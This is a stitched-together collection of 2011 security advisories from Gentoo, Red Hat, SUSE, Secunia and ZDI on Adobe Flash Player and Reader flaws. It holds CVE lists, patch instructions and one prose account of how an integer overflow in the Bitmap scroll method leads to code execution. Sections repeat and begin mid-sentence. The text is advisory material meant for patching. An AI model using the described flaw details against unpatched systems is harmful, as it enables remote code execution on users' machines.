http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
The flaw exists within the sequenceParameterSetNALUnit component. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
-- Disclosure Timeline:
2011-02-10 - Vulnerability reported to vendor
2011-08-23 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Red Hat update for flash-plugin
SECUNIA ADVISORY ID:
SA45593
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45593/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
RELEASE DATE:
2011-08-12
DISCUSS ADVISORY:
http://secunia.com/advisories/45593/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45593/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Red Hat has issued an update for flash-plugin. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
disclose sensitive information and compromise a user's system.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
RHSA-2011:1144-1:
https://rhn.redhat.com/errata/RHSA-2011-1144.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor
VAR-201108-0150 | CVE-2011-2138 | Adobe Flash Player and Adobe AIR Integer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2416. Adobe Flash Player and Adobe AIR Contains an integer overflow vulnerability. This vulnerability CVE-2011-2136 ,and CVE-2011-2416 Is a different vulnerability.An attacker could execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the code responsible for evaluating the scroll method of the Actionscript Bitmap class. The function that uses the parameters to the scroll method performs arithmetic using data from the instantiated Bitmap object. By creating a Bitmap with certain integer values and subsequently calling the scroll method with other large integer values it is possible to force an integer wrap to occur. The resulting value is utilized to calculate a pointer which is operated upon by memory copy operations. By crafting specific values this issue can be exploited to execute remote code in the context of the user running the browser. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
-- Disclosure Timeline:
2011-06-02 - Vulnerability reported to vendor
2011-08-12 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
